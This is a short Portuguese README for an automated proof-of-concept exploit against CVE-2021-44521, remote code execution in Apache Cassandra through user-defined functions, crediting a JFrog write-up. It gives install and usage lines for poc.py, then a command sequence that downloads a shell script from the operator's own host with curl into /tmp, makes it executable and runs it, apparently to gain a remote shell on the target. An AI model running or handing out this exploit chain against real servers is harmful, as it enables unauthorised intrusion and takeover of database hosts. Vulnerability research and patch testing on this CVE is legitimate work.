
Exploit automatizado de prova de conceito para CVE-2021-44521, permitindo execução remota de código no Apache Cassandra por meio de funções definidas pelo usuário. Executa comandos arbitrários no IP de destino.
PoC automatizado da CVE-2021-44521 Créditos ao PoC original: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Cassandra-driver
pip3 install cassandra-driver
python3 poc.py <ip> <cmd>
Observe que você não pode executar mais de um comando por vez, nem usar pipes por enquanto. Então execute
pyhon3 poc.py <ip> "curl http://<seu-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"